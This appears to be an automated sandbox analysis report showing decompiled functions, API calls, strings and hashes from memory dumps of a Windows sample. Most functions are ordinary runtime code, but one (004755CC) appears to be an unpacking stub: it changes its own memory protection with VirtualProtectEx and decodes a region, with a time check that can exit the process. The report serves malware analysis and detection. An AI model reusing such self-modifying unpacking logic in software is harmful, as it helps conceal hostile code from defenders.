$A, xrefs: 004540FA
MAINICON, xrefs: 0045410C
, I, xrefs: 00454111, 00454143
pdG, xrefs: 00454073, 0045407F
hdG, xrefs: 00454059, 00454065
4 I, xrefs: 004541B9

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$FileIconLoadLowerModuleName
String ID: $A$, I$4 I$MAINICON$hdG$pdG
API String ID: 3935243913-1156448763
Opcode ID: 922a619da9b682197febd900e6eb4aca87468131e6d7f4f96febd67333188d54
Instruction ID: 492b8d1dde61073156ccc58a81f1fa8c89c0acc6cd51feea0c930f19b9c0e10a
Opcode Fuzzy Hash: 922a619da9b682197febd900e6eb4aca87468131e6d7f4f96febd67333188d54
Instruction Fuzzy Hash: D55160706042449FDB00DF39C885B857BE4AB15308F4480BAED48DF397D7BAD988CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00452F50, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00452F50(char __edx, void* __edi) {
				char _v5;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t25;
				intOrPtr* _t28;
				intOrPtr* _t29;
				intOrPtr* _t48;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				char _t67;
				void* _t77;
				struct HDC__* _t78;
				void* _t79;
				void* _t80;

				_t77 = __edi;
				_t67 = __edx;
				if(__edx != 0) {
					_t80 = _t80 + 0xfffffff0;
					_t25 = E00403940(_t25, _t79);
				}
				_v5 = _t67;
				_t65 = _t25;
				E0041C178(_t66, 0);
				_t28 =  *0x490f64; // 0x476458
				 *((intOrPtr*)(_t28 + 4)) = _t65;
				 *_t28 = 0x4532f4;
				_t29 =  *0x490f70; // 0x476460
				 *((intOrPtr*)(_t29 + 4)) = _t65;
				 *_t29 = 0x453300;
				E0045330C(_t65);
				 *((intOrPtr*)(_t65 + 0x3c)) = GetKeyboardLayout(0);
				 *((intOrPtr*)(_t65 + 0x4c)) = E004035AC(1);
				 *((intOrPtr*)(_t65 + 0x50)) = E004035AC(1);
				 *((intOrPtr*)(_t65 + 0x54)) = E004035AC(1);
				 *((intOrPtr*)(_t65 + 0x58)) = E004035AC(1);
				 *((intOrPtr*)(_t65 + 0x7c)) = E004035AC(1);
				_t78 = GetDC(0);
				 *((intOrPtr*)(_t65 + 0x40)) = GetDeviceCaps(_t78, 0x5a);
				ReleaseDC(0, _t78);
				_t11 = _t65 + 0x58; // 0x44c3d06e
				_t48 =  *0x4910a4; // 0x492ab8
				 *((intOrPtr*)( *_t48))(0, 0, E0044F7D4,  *_t11);
				 *((intOrPtr*)(_t65 + 0x84)) = E0041F22C(1);
				 *((intOrPtr*)(_t65 + 0x88)) = E0041F22C(1);
				 *((intOrPtr*)(_t65 + 0x80)) = E0041F22C(1);
				E0045372C(_t65, _t65, _t66, _t77);
				_t15 = _t65 + 0x84; // 0x38004010
				_t59 =  *_t15;
				 *((intOrPtr*)(_t59 + 0xc)) = _t65;
				 *((intOrPtr*)(_t59 + 8)) = 0x453608;
				_t18 = _t65 + 0x88; // 0x90000000
				_t60 =  *_t18;
				 *((intOrPtr*)(_t60 + 0xc)) = _t65;
				 *((intOrPtr*)(_t60 + 8)) = 0x453608;
				_t21 = _t65 + 0x80; // 0xac000000
				_t61 =  *_t21;
				 *((intOrPtr*)(_t61 + 0xc)) = _t65;
				 *((intOrPtr*)(_t61 + 8)) = 0x453608;
				_t62 = _t65;
				if(_v5 != 0) {
					E00403998(_t62);
					_pop( *[fs:0x0]);
				}
				return _t65;
			}

0x00452f50
0x00452f50
0x00452f58
0x00452f5a
0x00452f5d
0x00452f5d
0x00452f62
0x00452f65
0x00452f6b
0x00452f70
0x00452f75
0x00452f78
0x00452f7e
0x00452f83
0x00452f86
0x00452f8e
0x00452f9a
0x00452fa9
0x00452fb8
0x00452fc7
0x00452fd6
0x00452fe5
0x00452fef
0x00452ff9
0x00452fff
0x00453004
0x00453012
0x00453019
0x00453027
0x00453039
0x0045304b
0x00453053
0x00453058
0x00453058
0x0045305e
0x00453061
0x00453068
0x00453068
0x0045306e
0x00453071
0x00453078
0x00453078
0x0045307e
0x00453081
0x00453088
0x0045308e
0x00453090
0x00453095
0x0045309c
0x004530a5

APIs

GetKeyboardLayout.USER32(00000000), ref: 00452F95
GetDC.USER32(00000000), ref: 00452FEA
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00452FF4
ReleaseDC.USER32 ref: 00452FFF

Strings

XdG, xrefs: 00452F70
`dG, xrefs: 00452F7E

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDeviceKeyboardLayoutRelease
String ID: XdG$`dG
API String ID: 3331096196-2051946594
Opcode ID: 2fd11fd8e630cee1da4b3216cba2d8a4f29a7d045d4c2127422d3f30164f92eb
Instruction ID: a1bd7cd623584787cd69cb3d3028c543d3de16661c23c3d8af0999e187b8e534
Opcode Fuzzy Hash: 2fd11fd8e630cee1da4b3216cba2d8a4f29a7d045d4c2127422d3f30164f92eb
Instruction Fuzzy Hash: 4B31FAB46516409FD740EF69DCC1B887BE4AB05359F0480BAE908DF367D77AA908CF18

Uniqueness

Uniqueness Score: -1.00%

Function 0045372C, Relevance: 10.6, APIs: 7, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0045372C(void* __eax, void* __ebx, void* __ecx, void* __edi) {
				char _v5;
				struct tagLOGFONTA _v65;
				struct tagLOGFONTA _v185;
				struct tagLOGFONTA _v245;
				void _v405;
				void* _t23;
				int _t27;
				void* _t30;
				intOrPtr _t38;
				struct HFONT__* _t41;
				struct HFONT__* _t45;
				struct HFONT__* _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t57;
				void* _t72;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t72 = __edi;
				_t74 = _t75;
				_t76 = _t75 + 0xfffffe6c;
				_t57 = __eax;
				_v5 = 0;
				if( *0x492c04 != 0) {
					_t54 =  *0x492c04; // 0x2370d40
					_v5 =  *((intOrPtr*)(_t54 + 0x88));
				}
				_push(_t74);
				_push(0x453871);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *0x492c04 != 0) {
					_t52 =  *0x492c04; // 0x2370d40
					E00455B40(_t52, 0);
				}
				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
					_t23 = GetStockObject(0xd);
					_t7 = _t57 + 0x84; // 0x38004010
					E0041F5BC( *_t7, _t23, _t72);
				} else {
					_t49 = CreateFontIndirectA( &_v65); // executed
					_t6 = _t57 + 0x84; // 0x38004010
					E0041F5BC( *_t6, _t49, _t72);
				}
				_v405 = 0x154;
				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
				if(_t27 == 0) {
					_t14 = _t57 + 0x80; // 0xac000000
					E0041F6A0( *_t14, 8);
					_t30 = GetStockObject(0xd);
					_t15 = _t57 + 0x88; // 0x90000000
					E0041F5BC( *_t15, _t30, _t72);
				} else {
					_t41 = CreateFontIndirectA( &_v185);
					_t11 = _t57 + 0x80; // 0xac000000
					E0041F5BC( *_t11, _t41, _t72);
					_t45 = CreateFontIndirectA( &_v245);
					_t13 = _t57 + 0x88; // 0x90000000
					E0041F5BC( *_t13, _t45, _t72);
				}
				_t16 = _t57 + 0x80; // 0xac000000
				E0041F400( *_t16, 0x80000017);
				_t17 = _t57 + 0x88; // 0x90000000
				E0041F400( *_t17, 0x80000007);
				 *[fs:eax] = 0x80000007;
				_push(0x453878);
				if( *0x492c04 != 0) {
					_t38 =  *0x492c04; // 0x2370d40
					return E00455B40(_t38, _v5);
				}
				return 0;
			}

APIs

SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 00453780
CreateFontIndirectA.GDI32(?), ref: 0045378D
GetStockObject.GDI32(0000000D), ref: 004537A3

Part of subcall function 0041F6A0: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041F6AD

SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 004537CC
CreateFontIndirectA.GDI32(?), ref: 004537DC
CreateFontIndirectA.GDI32(?), ref: 004537F5
GetStockObject.GDI32(0000000D), ref: 0045381B

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFontIndirect$InfoObjectParametersStockSystem
String ID:
API String ID: 2891467149-0
Opcode ID: 98616ab8f6d9abe34e636c37f226d4eff00a51b2a12bf5a117eb49641acfee1c
Instruction ID: 6bd9ad4d31924b99b51aa544d21399d5d680fff9bd20fef1580424f470487bef
Opcode Fuzzy Hash: 98616ab8f6d9abe34e636c37f226d4eff00a51b2a12bf5a117eb49641acfee1c
Instruction Fuzzy Hash: AA31C870644204ABDB14FF69CC46B9A33E5AB44305F4080BBFD08DB297DEB8994D8B2D

Uniqueness

Uniqueness Score: -1.00%

Function 0042727C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0042727C(int _a4) {
				void* __ebx;
				void* __ebp;
				signed int _t2;
				signed int _t3;
				void* _t7;
				int _t8;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t18;

				_t8 = _a4;
				if( *0x492ac4 == 0) {
					 *0x492a9c = E00427194(0, _t8,  *0x492a9c, _t17, _t18);
					_t7 =  *0x492a9c(_t8); // executed
					return _t7;
				}
				_t3 = _t2 | 0xffffffff;
				_t12 = _t8 + 0xffffffb4 - 2;
				__eflags = _t12;
				if(__eflags < 0) {
					_t3 = 0;
				} else {
					if(__eflags == 0) {
						_t8 = 0;
					} else {
						_t13 = _t12 - 1;
						__eflags = _t13;
						if(_t13 == 0) {
							_t8 = 1;
						} else {
							__eflags = _t13 - 0xffffffffffffffff;
							if(_t13 - 0xffffffffffffffff < 0) {
								_t3 = 1;
							}
						}
					}
				}
				__eflags = _t3 - 0xffffffff;
				if(_t3 != 0xffffffff) {
					return _t3;
				} else {
					return GetSystemMetrics(_t8);
				}
			}

APIs

GetSystemMetrics.USER32 ref: 004272DE

Part of subcall function 00427194: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427214

KiUserCallbackDispatcher.NTDLL ref: 004272A4

Strings

GetSystemMetrics, xrefs: 0042728C

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCallbackDispatcherMetricsProcSystemUser
String ID: GetSystemMetrics
API String ID: 54681038-96882338
Opcode ID: 0c26782bd003c680462a4f7e02363b1f8c577a652b25e792e5475779f882d3f7
Instruction ID: 0c54ae4e5e3beb960f0165100a1caa746b2001f93ff8537b215b7333a5855368
Opcode Fuzzy Hash: 0c26782bd003c680462a4f7e02363b1f8c577a652b25e792e5475779f882d3f7
Instruction Fuzzy Hash: 85F0963271C571DAC7204A75BE855233646A766330FE0C7B7F511866D6C27C9841923D

Uniqueness

Uniqueness Score: -1.00%

Function 0040174C, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040174C(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x4925e4; // 0x634244
				while(_t29 != 0x4925e4) {
					_t17 =  *(_t29 + 8);
					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 004017B9

Strings

DBc, xrefs: 0040178A, 004017CE
4Bc, xrefs: 0040174F

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID: 4Bc$DBc
API String ID: 4275171209-326498517
Opcode ID: f47e4311da42950ec54238d204e9b3a12ba0325d675df7de898aa2191d4c4d17
Instruction ID: 1ef196c48c205fabe416c2ab9c313d61ae50e0bb796a1c586f252d0c907e7949
Opcode Fuzzy Hash: f47e4311da42950ec54238d204e9b3a12ba0325d675df7de898aa2191d4c4d17
Instruction Fuzzy Hash: 24118E76A04705AFC3109F29CD80A2BBBE1EFD4760F16C53EE598A73A5D735AC408789

Uniqueness

Uniqueness Score: -1.00%

Function 004015B8, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015B8(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E0040146C(0x4925e4, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004018C1), ref: 004015E7
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004018C1), ref: 0040160E

Strings

DBc, xrefs: 004015F6

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFree
String ID: DBc
API String ID: 2087232378-2653348203
Opcode ID: 76e836fd95c562362f206a6cee2c1b3dd0eb72172e7f0547a6e7433b27dd2c69
Instruction ID: 5f734080e0c6898504fbed57d043c79a80c0a66a4bd47801b0e21cc9b2d0ee82
Opcode Fuzzy Hash: 76e836fd95c562362f206a6cee2c1b3dd0eb72172e7f0547a6e7433b27dd2c69
Instruction Fuzzy Hash: 3DF02E72B003202BEB30556A0CC1B5369C49F85764F190477FD4CFF3D9D6764C004259

Uniqueness

Uniqueness Score: -1.00%

Function 00440F64, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00440F64(void* __ecx, void* __edi, void* __esi) {
				intOrPtr _t6;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				void* _t16;
				void* _t17;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t28;

				_t25 = __esi;
				_t17 = __ecx;
				_push(_t28);
				_push(0x440fea);
				_push( *[fs:eax]);
				 *[fs:eax] = _t28;
				 *0x492b74 =  *0x492b74 - 1;
				if( *0x492b74 < 0) {
					 *0x492b70 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
					_t31 =  *0x492b70;
					E00440D14(_t16, __edi,  *0x492b70);
					_t6 =  *0x431620; // 0x43166c
					E004137EC(_t6, _t16, _t17,  *0x492b70);
					_t8 =  *0x431620; // 0x43166c
					E0041388C(_t8, _t16, _t17, _t31);
					_t21 =  *0x431620; // 0x43166c
					_t10 =  *0x4425f4; // 0x442640
					E00413838(_t10, _t16, _t21, __esi, _t31);
					_t22 =  *0x431620; // 0x43166c
					_t12 =  *0x440ff4; // 0x441040
					E00413838(_t12, _t16, _t22, __esi, _t31);
					_t23 =  *0x431620; // 0x43166c
					_t14 =  *0x4411a8; // 0x4411f4
					E00413838(_t14, _t16, _t23, _t25, _t31);
				}
				_pop(_t20);
				 *[fs:eax] = _t20;
				_push(0x440ff1);
				return 0;
			}

APIs

GetVersion.KERNEL32(00000000,00440FEA), ref: 00440F7E

Part of subcall function 00440D14: GetCurrentProcessId.KERNEL32(?,00000000,00440E8C), ref: 00440D35
Part of subcall function 00440D14: GlobalAddAtomA.KERNEL32 ref: 00440D68
Part of subcall function 00440D14: GetCurrentThreadId.KERNEL32 ref: 00440D83
Part of subcall function 00440D14: GlobalAddAtomA.KERNEL32 ref: 00440DB9
Part of subcall function 00440D14: RegisterClipboardFormatA.USER32 ref: 00440DCF
Part of subcall function 00440D14: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00440E8C), ref: 00440E53
Part of subcall function 00440D14: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00440E64

Strings

@&D, xrefs: 00440FB2

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
String ID: @&D
API String ID: 3775504709-1035227775
Opcode ID: a2fbba5a42664929df18566755faab9e3513ca1050ffd7aff72c1d59a57b5761
Instruction ID: 7a7f0a757190492a38e1b37b99fdc39b0e2de92bd21f2637399aa320090c02d8
Opcode Fuzzy Hash: a2fbba5a42664929df18566755faab9e3513ca1050ffd7aff72c1d59a57b5761
Instruction Fuzzy Hash: 7CF0CD78214641AFE314FF66EE1381837E8F74A306794103BF90083631CA78AC56CA4C

Uniqueness

Uniqueness Score: -1.00%

Function 00401414, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 34
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401414() {
				intOrPtr* _t4;
				void* _t5;
				void _t6;
				intOrPtr* _t9;
				void* _t12;
				void* _t14;

				if( *0x4925e0 != 0) {
					L5:
					_t4 =  *0x4925e0;
					 *0x4925e0 =  *_t4;
					return _t4;
				} else {
					_t5 = LocalAlloc(0, 0x644); // executed
					_t12 = _t5;
					if(_t12 != 0) {
						_t6 =  *0x4925dc; // 0x633c10
						 *_t12 = _t6;
						 *0x4925dc = _t12;
						_t14 = 0;
						do {
							_t2 = (_t14 + _t14) * 8; // 0x4
							_t9 = _t12 + _t2 + 4;
							 *_t9 =  *0x4925e0;
							 *0x4925e0 = _t9;
							_t14 = _t14 + 1;
						} while (_t14 != 0x64);
						goto L5;
					} else {
						return 0;
					}
				}
			}

APIs

LocalAlloc.KERNEL32(00000000,00000644,?,4Bc,00401477,?,?,00401517,?,?,?,?,?,00401A57), ref: 00401427

Strings

4Bc, xrefs: 00401414

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocLocal
String ID: 4Bc
API String ID: 3494564517-3403123003
Opcode ID: 5d0ed41f96699d87f21007e53ca226916ca96f4b6e26f47a9f4cb0a19ccb1334
Instruction ID: 87dc5a11db38574667a11397b0d3af5e4500ab7b4b95afebe61081be112248ab
Opcode Fuzzy Hash: 5d0ed41f96699d87f21007e53ca226916ca96f4b6e26f47a9f4cb0a19ccb1334
Instruction Fuzzy Hash: 12F082B17012019FDB14CF69D88065577E1EBA932AF21807FD585D7360E7758C418B44

Uniqueness

Uniqueness Score: -1.00%

Function 004755CC, Relevance: 1.6, APIs: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004755CC(void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
				long _v8;
				void* __ebx;
				void* __ecx;
				signed int _t22;
				signed int _t29;
				intOrPtr* _t31;

				_t31 = _a4;
				if(E00475588( *((intOrPtr*)( *_t31))) == 0) {
					if(E004755C0( *((intOrPtr*)( *_t31))) == 0) {
						return 0;
					}
					 *((intOrPtr*)( *(_t31 + 4) + 0xb8)) = 0x475574;
					return 0xffffffffffffffff;
				}
				_t22 =  *(_t31 + 4);
				if(( *(_t22 + 0xa8) ^ 0x000aed2e) != 0x3f745) {
					return 0;
				}
				VirtualProtectEx(0xffffffff,  *(_t22 + 0xac), 0x13cb5, 4,  &_v8); // executed
				E004756B4(_t31,  *((intOrPtr*)( *(_t31 + 4) + 0xac)), 0x13cb5, __edi, __esi, 0x1a080, 0x476e18);
				_t29 =  *(_t31 + 4);
				 *((intOrPtr*)(_t29 + 0xb8)) =  *((intOrPtr*)(_t29 + 0xb8)) + 0x3283;
				return _t29 | 0xffffffff;
			}

0x004755d1
0x004755df
0x00475651
0x00000000
0x00475666
0x0047565b
0x00000000
0x00475661
0x004755e1
0x004755f6
0x00000000
0x00475642
0x0047560c
0x0047562b
0x00475630
0x00475633
0x00000000

APIs

Part of subcall function 00475588: GetSystemTime.KERNEL32 ref: 0047558F
Part of subcall function 00475588: ExitProcess.KERNEL32(00000000), ref: 0047559E
Part of subcall function 00475588: GetNextDlgTabItem.USER32(00000000,00000000,00000000), ref: 004755B4

VirtualProtectEx.KERNEL32(000000FF,?,00013CB5,00000004,?), ref: 0047560C

Part of subcall function 004756B4: GetNextDlgTabItem.USER32(00000000,00000000,00000000), ref: 004756DF

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemNext$ExitProcessProtectSystemTimeVirtual
String ID:
API String ID: 3234653472-0
Opcode ID: a4aa576997493bf57116bfdc1c070e249d4816c36d3c8b245ddef3406778fff9
Instruction ID: 683db2bf605079b025cb99da7a3986bab2d689136ca3cf0b0fc224d54438be29
Opcode Fuzzy Hash: a4aa576997493bf57116bfdc1c070e249d4816c36d3c8b245ddef3406778fff9
Instruction Fuzzy Hash: 3F11A534604600EFDB40DF24C881EE273E5EB05724F64C6A6B91C5F3A6D6B4ED05CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040731A, Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040731A(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				struct HWND__* _t10;

				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				return _t10;
			}

0x00407345
0x0040734c

APIs

CreateWindowExA.USER32 ref: 00407345

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 4185589135e2d0d8a1c3fe1e13e4309022baba8be44e6f9ece8cfaf062a63ca3
Instruction ID: 3ae3b0bb6aa290208680c541b8da8ad6351dd4405c79d6abd1241d14a227bfc1
Opcode Fuzzy Hash: 4185589135e2d0d8a1c3fe1e13e4309022baba8be44e6f9ece8cfaf062a63ca3
Instruction Fuzzy Hash: A7E002B2204309BFEB00DE8ADCC1DABB7ACFB4C654F854115BB1C97242D275AD608B71

Uniqueness

Uniqueness Score: -1.00%

Function 0040731C, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040731C(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				struct HWND__* _t10;

				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				return _t10;
			}

0x00407345
0x0040734c

APIs

CreateWindowExA.USER32 ref: 00407345

Memory Dump Source

Source File: 00000005.00000002.707244386.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.707234394.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.707402455.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707411092.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707417422.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.707426690.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.707439571.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: b901072617b8609411aa665ed91509b478441abd6de2cb5ea206074649d503f6
Instruction ID: 109ed22ea2e506524b14edc0d0bd377e8b92066772ad28182da1425e8690dcbf
